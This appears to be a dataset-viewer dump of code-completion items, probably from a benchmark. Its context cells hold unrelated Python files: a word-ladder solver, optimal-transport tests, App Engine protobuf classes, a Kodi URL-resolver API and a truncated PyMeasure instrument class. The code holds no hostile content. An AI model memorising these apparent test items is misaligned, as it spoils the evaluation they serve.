gt stringclasses 1
value | context stringlengths 2.49k 119k |
|---|---|
# -*- coding: utf-8 -*-
"""
word_ladder_2.py
~~~~~~~~~~~~~~
A brief description goes here.
"""
import copy
class Solution:
# @param start, a string
# @param end, a string
# @param dictionary, a set of string
# @return a list of lists of string
MAX_EDGE_VALUE = 9999
def findLadders(self, start, end, dictionary):
Solution.access_cache = {}
return self.shortest_path(start, end, dictionary)
#return self.breath_first_search(start, end, dictionary)
def can_access(self, a, b):
diff = 0
i = 0
try:
while i < len(a):
if a[i] != b[i]:
diff += 1
if diff >= 2:
return False
i += 1
except:
raise
return True
def iterate_character(self, current, dict_set, visited_set):
s1 = set()
for i in range(len(current)):
for j in range(1, 26):
new_word = current[0:i] +\
chr((ord(current[i]) - ord('a') + j) % 26 + ord('a')) + current[i+1:]
s1.add(new_word)
s = s1.intersection(dict_set) - visited_set
return s
def get_possible_changes(self, current, dictionary):
if Solution.access_cache.has_key(current):
return Solution.access_cache[current]
def iterate_all_possibility():
s = set()
for i in dictionary:
if current != i and self.can_access(current, i):
s.add(i)
return s
#s = iterate_character()
s = iterate_all_possibility()
Solution.access_cache[current] = copy.copy(s)
return s
def get_edges(self, start, end, dictionary):
d = set(copy.copy(dictionary))
d.add(start)
d.add(end)
edges = {}
for i in d: # optimization, uniformed initialization
edges[i] = {}
dict_set = set(dictionary)
visited_set = set()
for i in d:
iterable_words = self.iterate_character(i, dict_set, visited_set)
for j in iterable_words:
edges[i][j] = 1
edges[j][i] = 1
visited_set.add(i)
return edges
def shortest_path(self, start, end, dictionary):
def get_min_edge(verticles, shortest_paths):
min_value = Solution.MAX_EDGE_VALUE
min_verticle = None
for i in verticles:
if shortest_paths.has_key(i) and shortest_paths[i]['value'] < min_value:
min_value = shortest_paths[i]['value']
min_verticle = i
return min_verticle
def get_all_paths(end, paths):
whole_paths = [[end]]
result = []
while whole_paths:
path = whole_paths.pop()
proceed = path[-1]
if shortest_paths[proceed].has_key('previous'):
for i in shortest_paths[proceed]['previous']:
l = copy.copy(path)
l.append(i)
whole_paths.append(l)
else:
path.append(start)
path.reverse()
result.append(path)
return result
edges = self.get_edges(start, end, dictionary)
if not start in edges:
return []
shortest_paths = {}
for i in edges[start]:
shortest_paths[i] = {
'value': edges[start][i]
}
unresolved_verticles = set(dictionary)
unresolved_verticles.add(end)
while unresolved_verticles:
current_min_verticle = get_min_edge(unresolved_verticles, shortest_paths)
if current_min_verticle == end: # if the end is specified, bread directly
break
elif current_min_verticle == None:
print shortest_paths, unresolved_verticles
print Solution.access_cache
return []
unresolved_verticles.remove(current_min_verticle)
for destination in edges[current_min_verticle]:
new_path_value = shortest_paths[current_min_verticle]['value'] + edges[current_min_verticle][destination]
if not shortest_paths.has_key(destination):
shortest_paths[destination] = {
'value': new_path_value,
'previous': [current_min_verticle],
}
else:
if new_path_value < shortest_paths[destination]['value']:
shortest_paths[destination] = {
'value': new_path_value,
'previous': [current_min_verticle],
}
elif new_path_value == shortest_paths[destination]['value']:
shortest_paths[destination]['previous'].append(current_min_verticle)
paths = get_all_paths(end, shortest_paths)
return paths
def breath_first_search(self, start, end, dictionary):
max_path_len = len(dictionary)
i = 1
while i<=max_path_len:
print 'trying %i...' % i
paths = self.depth_first_search(i, start, end, dictionary)
if paths:
return paths
else:
i += 1
return []
def get_current_possible_changes(self, current, dictionary, tried):
s = self.get_possible_changes(current, dictionary)
result = s - set(tried)
return result
def depth_first_search(self, max_depth, start, end, dictionary):
stack = [start]
result = []
state = []
tried = set()
while stack:
try:
current = stack[-1]
state.append(current)
if len(state) == max_depth: # final chance
if self.can_access(current, end):
result.append(copy.copy(state))
while stack and state and stack[-1] == state[-1]:
stack.pop()
state.pop()
else:
available_nodes = self.get_current_possible_changes(current, dictionary, state)
if available_nodes:
for i in available_nodes:
stack.append(i)
else: # backtracking
while stack and state and stack[-1] == state[-1]:
stack.pop()
state.pop()
except:
print "state=%s\ntried=%s\nresult=%s" % (state, tried, result)
raise
return result
def _main(argv):
import time
s = Solution()
datas = [["hit", "cog", ["hot","dot","dog","lot","log"]],
["a", "c", ["a","b","c"]],
["hot", "dog", ["hot","dog"]],
["hit", "cog", ["hot","cog","dot","dog","hit", "lot", "log"]],
]
for start, end, d in datas:
begin = time.time()
print start, end, len(d)
print s.findLadders(start, end, d)
end = time.time()
print end - begin
if __name__ == '__main__':
import sys
_main(sys.argv)
| |
"""Tests for module utils for timing and parallel computation """
# Author: Remi Flamary <remi.flamary@unice.fr>
#
# License: MIT License
import ot
import numpy as np
import sys
def test_parmap():
n = 100
def f(i):
return 1.0 * i * i
a = np.arange(n)
l1 = list(map(f, a))
l2 = list(ot.utils.parmap(f, a))
np.testing.assert_allclose(l1, l2)
def test_tic_toc():
import time
ot.tic()
time.sleep(0.5)
t = ot.toc()
t2 = ot.toq()
# test timing
np.testing.assert_allclose(0.5, t, rtol=1e-2, atol=1e-2)
# test toc vs toq
np.testing.assert_allclose(t, t2, rtol=1e-2, atol=1e-2)
def test_kernel():
n = 100
x = np.random.randn(n, 2)
K = ot.utils.kernel(x, x)
# gaussian kernel has ones on the diagonal
np.testing.assert_allclose(np.diag(K), np.ones(n))
def test_unif():
n = 100
u = ot.unif(n)
np.testing.assert_allclose(1, np.sum(u))
def test_dist():
n = 100
x = np.random.randn(n, 2)
D = np.zeros((n, n))
for i in range(n):
for j in range(n):
D[i, j] = np.sum(np.square(x[i, :] - x[j, :]))
D2 = ot.dist(x, x)
D3 = ot.dist(x)
# dist shoul return squared euclidean
np.testing.assert_allclose(D, D2)
np.testing.assert_allclose(D, D3)
def test_dist0():
n = 100
M = ot.utils.dist0(n, method='lin_square')
# dist0 default to linear sampling with quadratic loss
np.testing.assert_allclose(M[0, -1], (n - 1) * (n - 1))
def test_dots():
n1, n2, n3, n4 = 100, 50, 200, 100
A = np.random.randn(n1, n2)
B = np.random.randn(n2, n3)
C = np.random.randn(n3, n4)
X1 = ot.utils.dots(A, B, C)
X2 = A.dot(B.dot(C))
np.testing.assert_allclose(X1, X2)
def test_clean_zeros():
n = 100
nz = 50
nz2 = 20
u1 = ot.unif(n)
u1[:nz] = 0
u1 = u1 / u1.sum()
u2 = ot.unif(n)
u2[:nz2] = 0
u2 = u2 / u2.sum()
M = ot.utils.dist0(n)
a, b, M2 = ot.utils.clean_zeros(u1, u2, M)
assert len(a) == n - nz
assert len(b) == n - nz2
def test_gpu_fun():
n = 100
A = np.ones((n, n))
A.sum()
def test_cost_normalization():
C = np.random.rand(10, 10)
# does nothing
M0 = ot.utils.cost_normalization(C)
np.testing.assert_allclose(C, M0)
M = ot.utils.cost_normalization(C, 'median')
np.testing.assert_allclose(np.median(M), 1)
M = ot.utils.cost_normalization(C, 'max')
np.testing.assert_allclose(M.max(), 1)
M = ot.utils.cost_normalization(C, 'log')
np.testing.assert_allclose(M.max(), np.log(1 + C).max())
M = ot.utils.cost_normalization(C, 'loglog')
np.testing.assert_allclose(M.max(), np.log(1 + np.log(1 + C)).max())
def test_check_params():
res1 = ot.utils.check_params(first='OK', second=20)
assert res1 is True
res0 = ot.utils.check_params(first='OK', second=None)
assert res0 is False
def test_deprecated_func():
@ot.utils.deprecated('deprecated text for fun')
def fun():
pass
def fun2():
pass
@ot.utils.deprecated('deprecated text for class')
class Class():
pass
if sys.version_info < (3, 5):
print('Not tested')
else:
assert ot.utils._is_deprecated(fun) is True
assert ot.utils._is_deprecated(fun2) is False
def test_BaseEstimator():
class Class(ot.utils.BaseEstimator):
def __init__(self, first='spam', second='eggs'):
self.first = first
self.second = second
cl = Class()
names = cl._get_param_names()
assert 'first' in names
assert 'second' in names
params = cl.get_params()
assert 'first' in params
assert 'second' in params
params['first'] = 'spam again'
cl.set_params(**params)
assert cl.first == 'spam again'
| |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.net.proto import ProtocolBuffer
import array
import dummy_thread as thread
__pychecker__ = """maxreturns=0 maxbranches=0 no-callinit
unusednames=printElemNumber,debug_strs no-special"""
class CapabilityConfigList(ProtocolBuffer.ProtocolMessage):
has_default_config_ = 0
default_config_ = None
def __init__(self, contents=None):
self.config_ = []
self.lazy_init_lock_ = thread.allocate_lock()
if contents is not None: self.MergeFromString(contents)
def config_size(self): return len(self.config_)
def config_list(self): return self.config_
def config(self, i):
return self.config_[i]
def mutable_config(self, i):
return self.config_[i]
def add_config(self):
x = CapabilityConfig()
self.config_.append(x)
return x
def clear_config(self):
self.config_ = []
def default_config(self):
if self.default_config_ is None:
self.lazy_init_lock_.acquire()
try:
if self.default_config_ is None: self.default_config_ = CapabilityConfig()
finally:
self.lazy_init_lock_.release()
return self.default_config_
def mutable_default_config(self): self.has_default_config_ = 1; return self.default_config()
def clear_default_config(self):
if self.has_default_config_:
self.has_default_config_ = 0;
if self.default_config_ is not None: self.default_config_.Clear()
def has_default_config(self): return self.has_default_config_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.config_size()): self.add_config().CopyFrom(x.config(i))
if (x.has_default_config()): self.mutable_default_config().MergeFrom(x.default_config())
def Equals(self, x):
if x is self: return 1
if len(self.config_) != len(x.config_): return 0
for e1, e2 in zip(self.config_, x.config_):
if e1 != e2: return 0
if self.has_default_config_ != x.has_default_config_: return 0
if self.has_default_config_ and self.default_config_ != x.default_config_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.config_:
if not p.IsInitialized(debug_strs): initialized=0
if (self.has_default_config_ and not self.default_config_.IsInitialized(debug_strs)): initialized = 0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.config_)
for i in xrange(len(self.config_)): n += self.lengthString(self.config_[i].ByteSize())
if (self.has_default_config_): n += 1 + self.lengthString(self.default_config_.ByteSize())
return n + 0
def Clear(self):
self.clear_config()
self.clear_default_config()
def OutputUnchecked(self, out):
for i in xrange(len(self.config_)):
out.putVarInt32(10)
out.putVarInt32(self.config_[i].ByteSize())
self.config_[i].OutputUnchecked(out)
if (self.has_default_config_):
out.putVarInt32(18)
out.putVarInt32(self.default_config_.ByteSize())
self.default_config_.OutputUnchecked(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_config().TryMerge(tmp)
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_default_config().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.config_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("config%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_default_config_:
res+=prefix+"default_config <\n"
res+=self.default_config_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kconfig = 1
kdefault_config = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "config",
2: "default_config",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
class CapabilityConfig(ProtocolBuffer.ProtocolMessage):
ENABLED = 1
SCHEDULED = 2
DISABLED = 3
UNKNOWN = 4
_Status_NAMES = {
1: "ENABLED",
2: "SCHEDULED",
3: "DISABLED",
4: "UNKNOWN",
}
def Status_Name(cls, x): return cls._Status_NAMES.get(x, "")
Status_Name = classmethod(Status_Name)
has_package_ = 0
package_ = ""
has_capability_ = 0
capability_ = ""
has_status_ = 0
status_ = 4
has_scheduled_time_ = 0
scheduled_time_ = ""
has_internal_message_ = 0
internal_message_ = ""
has_admin_message_ = 0
admin_message_ = ""
has_error_message_ = 0
error_message_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def package(self): return self.package_
def set_package(self, x):
self.has_package_ = 1
self.package_ = x
def clear_package(self):
if self.has_package_:
self.has_package_ = 0
self.package_ = ""
def has_package(self): return self.has_package_
def capability(self): return self.capability_
def set_capability(self, x):
self.has_capability_ = 1
self.capability_ = x
def clear_capability(self):
if self.has_capability_:
self.has_capability_ = 0
self.capability_ = ""
def has_capability(self): return self.has_capability_
def status(self): return self.status_
def set_status(self, x):
self.has_status_ = 1
self.status_ = x
def clear_status(self):
if self.has_status_:
self.has_status_ = 0
self.status_ = 4
def has_status(self): return self.has_status_
def scheduled_time(self): return self.scheduled_time_
def set_scheduled_time(self, x):
self.has_scheduled_time_ = 1
self.scheduled_time_ = x
def clear_scheduled_time(self):
if self.has_scheduled_time_:
self.has_scheduled_time_ = 0
self.scheduled_time_ = ""
def has_scheduled_time(self): return self.has_scheduled_time_
def internal_message(self): return self.internal_message_
def set_internal_message(self, x):
self.has_internal_message_ = 1
self.internal_message_ = x
def clear_internal_message(self):
if self.has_internal_message_:
self.has_internal_message_ = 0
self.internal_message_ = ""
def has_internal_message(self): return self.has_internal_message_
def admin_message(self): return self.admin_message_
def set_admin_message(self, x):
self.has_admin_message_ = 1
self.admin_message_ = x
def clear_admin_message(self):
if self.has_admin_message_:
self.has_admin_message_ = 0
self.admin_message_ = ""
def has_admin_message(self): return self.has_admin_message_
def error_message(self): return self.error_message_
def set_error_message(self, x):
self.has_error_message_ = 1
self.error_message_ = x
def clear_error_message(self):
if self.has_error_message_:
self.has_error_message_ = 0
self.error_message_ = ""
def has_error_message(self): return self.has_error_message_
def MergeFrom(self, x):
assert x is not self
if (x.has_package()): self.set_package(x.package())
if (x.has_capability()): self.set_capability(x.capability())
if (x.has_status()): self.set_status(x.status())
if (x.has_scheduled_time()): self.set_scheduled_time(x.scheduled_time())
if (x.has_internal_message()): self.set_internal_message(x.internal_message())
if (x.has_admin_message()): self.set_admin_message(x.admin_message())
if (x.has_error_message()): self.set_error_message(x.error_message())
def Equals(self, x):
if x is self: return 1
if self.has_package_ != x.has_package_: return 0
if self.has_package_ and self.package_ != x.package_: return 0
if self.has_capability_ != x.has_capability_: return 0
if self.has_capability_ and self.capability_ != x.capability_: return 0
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if self.has_scheduled_time_ != x.has_scheduled_time_: return 0
if self.has_scheduled_time_ and self.scheduled_time_ != x.scheduled_time_: return 0
if self.has_internal_message_ != x.has_internal_message_: return 0
if self.has_internal_message_ and self.internal_message_ != x.internal_message_: return 0
if self.has_admin_message_ != x.has_admin_message_: return 0
if self.has_admin_message_ and self.admin_message_ != x.admin_message_: return 0
if self.has_error_message_ != x.has_error_message_: return 0
if self.has_error_message_ and self.error_message_ != x.error_message_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_package_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: package not set.')
if (not self.has_capability_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: capability not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.package_))
n += self.lengthString(len(self.capability_))
if (self.has_status_): n += 1 + self.lengthVarInt64(self.status_)
if (self.has_scheduled_time_): n += 1 + self.lengthString(len(self.scheduled_time_))
if (self.has_internal_message_): n += 1 + self.lengthString(len(self.internal_message_))
if (self.has_admin_message_): n += 1 + self.lengthString(len(self.admin_message_))
if (self.has_error_message_): n += 1 + self.lengthString(len(self.error_message_))
return n + 2
def Clear(self):
self.clear_package()
self.clear_capability()
self.clear_status()
self.clear_scheduled_time()
self.clear_internal_message()
self.clear_admin_message()
self.clear_error_message()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.package_)
out.putVarInt32(18)
out.putPrefixedString(self.capability_)
if (self.has_status_):
out.putVarInt32(24)
out.putVarInt32(self.status_)
if (self.has_internal_message_):
out.putVarInt32(34)
out.putPrefixedString(self.internal_message_)
if (self.has_admin_message_):
out.putVarInt32(42)
out.putPrefixedString(self.admin_message_)
if (self.has_error_message_):
out.putVarInt32(50)
out.putPrefixedString(self.error_message_)
if (self.has_scheduled_time_):
out.putVarInt32(58)
out.putPrefixedString(self.scheduled_time_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_package(d.getPrefixedString())
continue
if tt == 18:
self.set_capability(d.getPrefixedString())
continue
if tt == 24:
self.set_status(d.getVarInt32())
continue
if tt == 34:
self.set_internal_message(d.getPrefixedString())
continue
if tt == 42:
self.set_admin_message(d.getPrefixedString())
continue
if tt == 50:
self.set_error_message(d.getPrefixedString())
continue
if tt == 58:
self.set_scheduled_time(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_package_: res+=prefix+("package: %s\n" % self.DebugFormatString(self.package_))
if self.has_capability_: res+=prefix+("capability: %s\n" % self.DebugFormatString(self.capability_))
if self.has_status_: res+=prefix+("status: %s\n" % self.DebugFormatInt32(self.status_))
if self.has_scheduled_time_: res+=prefix+("scheduled_time: %s\n" % self.DebugFormatString(self.scheduled_time_))
if self.has_internal_message_: res+=prefix+("internal_message: %s\n" % self.DebugFormatString(self.internal_message_))
if self.has_admin_message_: res+=prefix+("admin_message: %s\n" % self.DebugFormatString(self.admin_message_))
if self.has_error_message_: res+=prefix+("error_message: %s\n" % self.DebugFormatString(self.error_message_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kpackage = 1
kcapability = 2
kstatus = 3
kscheduled_time = 7
kinternal_message = 4
kadmin_message = 5
kerror_message = 6
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "package",
2: "capability",
3: "status",
4: "internal_message",
5: "admin_message",
6: "error_message",
7: "scheduled_time",
}, 7)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.STRING,
5: ProtocolBuffer.Encoder.STRING,
6: ProtocolBuffer.Encoder.STRING,
7: ProtocolBuffer.Encoder.STRING,
}, 7, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
__all__ = ['CapabilityConfigList','CapabilityConfig']
| |
# -*- coding: utf-8 -*-
"""
URLResolver Addon for Kodi
Copyright (C) 2016 t0mm0, tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
'''
This module provides the main API for accessing the urlresolver features.
For most cases you probably want to use :func:`urlresolver.resolve` or
:func:`urlresolver.choose_source`.
.. seealso::
:class:`HostedMediaFile`
'''
import re
import urlparse
import sys
import os
import xbmcgui
import common
import xml.dom.minidom
from hmf import HostedMediaFile
from urlresolver9.resolver import UrlResolver
from plugins import *
common.log_utils.log_notice('Initializing URLResolver version: %s' % (common.addon_version))
MAX_SETTINGS = 75
PLUGIN_DIRS = []
host_cache = {}
# Terrible hack to allow hmf to set a global var to stop pop-ups for all resolvers during resolve()
ALLOW_POPUPS = True
def add_plugin_dirs(dirs):
global PLUGIN_DIRS
if isinstance(dirs, basestring):
PLUGIN_DIRS.append(dirs)
else:
PLUGIN_DIRS += dirs
def load_external_plugins():
for d in PLUGIN_DIRS:
common.log_utils.log_debug('Adding plugin path: %s' % (d))
sys.path.insert(0, d)
for filename in os.listdir(d):
if not filename.startswith('__') and filename.endswith('.py'):
mod_name = filename[:-3]
imp = __import__(mod_name, globals(), locals())
sys.modules[mod_name] = imp
common.log_utils.log_debug('Loaded %s as %s from %s' % (imp, mod_name, filename))
def relevant_resolvers(domain=None, include_universal=None, include_external=False, include_disabled=False, order_matters=False):
if include_external:
load_external_plugins()
if isinstance(domain, basestring):
domain = domain.lower()
if include_universal is None:
include_universal = common.get_setting('allow_universal') == "true"
classes = UrlResolver.__class__.__subclasses__(UrlResolver)
relevant = []
for resolver in classes:
if include_disabled or resolver._is_enabled():
if include_universal or not resolver.isUniversal():
if domain is None or ((domain and any(domain in res_domain.lower() for res_domain in resolver.domains)) or '*' in resolver.domains):
relevant.append(resolver)
if order_matters:
relevant.sort(key=lambda x: x._get_priority())
common.log_utils.log_debug('Relevant Resolvers: %s' % (relevant))
return relevant
def resolve(web_url):
'''
Resolve a web page to a media stream.
It is usually as simple as::
import urlresolver9
media_url = urlresolver.resolve(web_url)
where ``web_url`` is the address of a web page which is associated with a
media file and ``media_url`` is the direct URL to the media.
Behind the scenes, :mod:`urlresolver` will check each of the available
resolver plugins to see if they accept the ``web_url`` in priority order
(lowest priotity number first). When it finds a plugin willing to resolve
the URL, it passes the ``web_url`` to the plugin and returns the direct URL
to the media file, or ``False`` if it was not possible to resolve.
.. seealso::
:class:`HostedMediaFile`
Args:
web_url (str): A URL to a web page associated with a piece of media
content.
Returns:
If the ``web_url`` could be resolved, a string containing the direct
URL to the media file, if not, returns ``False``.
'''
source = HostedMediaFile(url=web_url)
return source.resolve()
def filter_source_list(source_list):
'''
Takes a list of :class:`HostedMediaFile`s representing web pages that are
thought to be associated with media content. If no resolver plugins exist
to resolve a :class:`HostedMediaFile` to a link to a media file it is
removed from the list.
Args:
urls (list of :class:`HostedMediaFile`): A list of
:class:`HostedMediaFiles` representing web pages that are thought to be
associated with media content.
Returns:
The same list of :class:`HostedMediaFile` but with any that can't be
resolved by a resolver plugin removed.
'''
return [source for source in source_list if source]
def choose_source(sources):
'''
Given a list of :class:`HostedMediaFile` representing web pages that are
thought to be associated with media content this function checks which are
playable and if there are more than one it pops up a dialog box displaying
the choices.
Example::
sources = [HostedMediaFile(url='http://youtu.be/VIDEOID', title='Youtube [verified] (20 views)'),
HostedMediaFile(url='http://putlocker.com/file/VIDEOID', title='Putlocker (3 views)')]
source = urlresolver.choose_source(sources)
if source:
stream_url = source.resolve()
addon.resolve_url(stream_url)
else:
addon.resolve_url(False)
Args:
sources (list): A list of :class:`HostedMediaFile` representing web
pages that are thought to be associated with media content.
Returns:
The chosen :class:`HostedMediaFile` or ``False`` if the dialog is
cancelled or none of the :class:`HostedMediaFile` are resolvable.
'''
sources = filter_source_list(sources)
if not sources:
common.log_utils.log_warning('no playable streams found')
return False
elif len(sources) == 1:
return sources[0]
else:
dialog = xbmcgui.Dialog()
index = dialog.select('Choose your stream', [source.title for source in sources])
if index > -1:
return sources[index]
else:
return False
def scrape_supported(html, regex=None, host_only=False):
'''
returns a list of links scraped from the html that are supported by urlresolver
args:
html: the html to be scraped
regex: an optional argument to override the default regex which is: href\s*=\s*["']([^'"]+
host_only: an optional argument if true to do only host validation vs full url validation (default False)
Returns:
a list of links scraped from the html that passed validation
'''
if regex is None: regex = '''href\s*=\s*['"]([^'"]+)'''
links = []
for match in re.finditer(regex, html):
stream_url = match.group(1)
host = urlparse.urlparse(stream_url).hostname
if host_only:
if host is None:
continue
if host in host_cache:
if host_cache[host]:
links.append(stream_url)
continue
else:
hmf = HostedMediaFile(host=host, media_id='dummy') # use dummy media_id to allow host validation
else:
hmf = HostedMediaFile(url=stream_url)
is_valid = hmf.valid_url()
host_cache[host] = is_valid
if is_valid:
links.append(stream_url)
return links
def display_settings():
'''
Opens the settings dialog for :mod:`urlresolver` and its plugins.
This can be called from your addon to provide access to global
:mod:`urlresolver` settings. Each resolver plugin is also capable of
exposing settings.
.. note::
All changes made to these setting by the user are global and will
affect any addon that uses :mod:`urlresolver` and its plugins.
'''
_update_settings_xml()
common.open_settings()
def _update_settings_xml():
return
'''
This function writes a new ``resources/settings.xml`` file which contains
all settings for this addon and its plugins.
'''
try:
os.makedirs(os.path.dirname(common.settings_file))
except OSError:
pass
new_xml = [
'<?xml version="1.0" encoding="utf-8" standalone="yes"?>',
'<settings>',
'\t<category label="URLResolver">',
'\t\t<setting default="true" id="allow_universal" label="Enable Universal Resolvers" type="bool"/>',
'\t\t<setting default="true" id="use_cache" label="Use Function Cache" type="bool"/>',
'\t\t<setting id="reset_cache" type="action" label="Reset Function Cache" action="RunPlugin(plugin://script.mrknow.urlresolver/?mode=reset_cache)"/>',
'\t\t<setting id="personal_nid" label="Your NID" type="text" visible="false"/>',
'\t</category>',
'\t<category label="Universal Resolvers">']
resolvers = relevant_resolvers(include_universal=True, include_disabled=True)
resolvers = sorted(resolvers, key=lambda x: x.name.upper())
for resolver in resolvers:
if resolver.isUniversal():
new_xml.append('\t\t<setting label="%s" type="lsep"/>' % (resolver.name))
new_xml += ['\t\t' + line for line in resolver.get_settings_xml()]
new_xml.append('\t</category>')
new_xml.append('\t<category label="Resolvers 1">')
i = 0
cat_count = 2
for resolver in resolvers:
if not resolver.isUniversal():
if i > MAX_SETTINGS:
new_xml.append('\t</category>')
new_xml.append('\t<category label="Resolvers %s">' % (cat_count))
cat_count += 1
i = 0
new_xml.append('\t\t<setting label="%s" type="lsep"/>' % (resolver.name))
res_xml = resolver.get_settings_xml()
new_xml += ['\t\t' + line for line in res_xml]
i += len(res_xml) + 1
new_xml.append('\t</category>')
new_xml.append('</settings>')
try:
with open(common.settings_file, 'r') as f:
old_xml = f.read()
except:
old_xml = ''
new_xml = '\n'.join(new_xml)
if old_xml != new_xml:
common.log_utils.log_debug('Updating Settings XML')
try:
with open(common.settings_file, 'w') as f:
f.write(new_xml)
except:
raise
else:
common.log_utils.log_debug('No Settings Update Needed')
#_update_settings_xml()
| |
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2017 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
from pymeasure.adapters.visa import VISAAdapter
from pymeasure.adapters import FakeAdapter
import numpy as np
import inspect
class Instrument(object):
""" This provides the base class for all Instruments, which is
independent of the particular Adapter used to connect for
communication to the instrument. It provides basic SCPI commands
by default, but can be toggled with :code:`includeSCPI`.
:param adapter: An :class:`Adapter<pymeasure.adapters.Adapter>` object
:param name: A string name
:param includeSCPI: A boolean, which toggles the inclusion of standard SCPI commands
"""
def __init__(self, adapter, name, includeSCPI=True, **kwargs):
try:
if isinstance(adapter, (int, str)):
adapter = VISAAdapter(adapter, **kwargs)
except ImportError:
raise Exception("Invalid Adapter provided for Instrument since "
"PyVISA is not present")
self.name = name
self.SCPI = includeSCPI
self.adapter = adapter
class Object(object):
pass
self.get = Object()
# TODO: Determine case basis for the addition of these methods
if includeSCPI:
# Basic SCPI commands
self.status = self.measurement("*STB?",
""" Returns the status of the instrument """)
self.complete = self.measurement("*OPC?",
""" TODO: Add this doc """)
self.isShutdown = False
log.info("Initializing %s." % self.name)
@property
def id(self):
""" Requests and returns the identification of the instrument. """
if self.SCPI:
return self.adapter.ask("*IDN?").strip()
else:
return "Warning: Property not implemented."
# Wrapper functions for the Adapter object
def ask(self, command):
""" Writes the command to the instrument through the adapter
and returns the read response.
:param command: command string to be sent to the instrument
"""
return self.adapter.ask(command)
def write(self, command):
""" Writes the command to the instrument through the adapter.
:param command: command string to be sent to the instrument
"""
self.adapter.write(command)
def read(self):
""" Reads from the instrument through the adapter and returns the
response.
"""
return self.adapter.read()
def values(self, command, **kwargs):
""" Reads a set of values from the instrument through the adapter,
passing on any key-word arguments.
"""
return self.adapter.values(command, **kwargs)
def binary_values(self, command, header_bytes=0, dtype=np.float32):
return self.adapter.binary_values(command, header_bytes, dtype)
@staticmethod
def control(get_command, set_command, docs,
validator=lambda v, vs: v, values=[], map_values=False,
get_process=lambda v: v, set_process=lambda v: v,
check_set_errors=False, check_get_errors=False,
**kwargs):
"""Returns a property for the class based on the supplied
commands. This property may be set and read from the
instrument.
:param get_command: A string command that asks for the value
:param set_command: A string command that writes the value
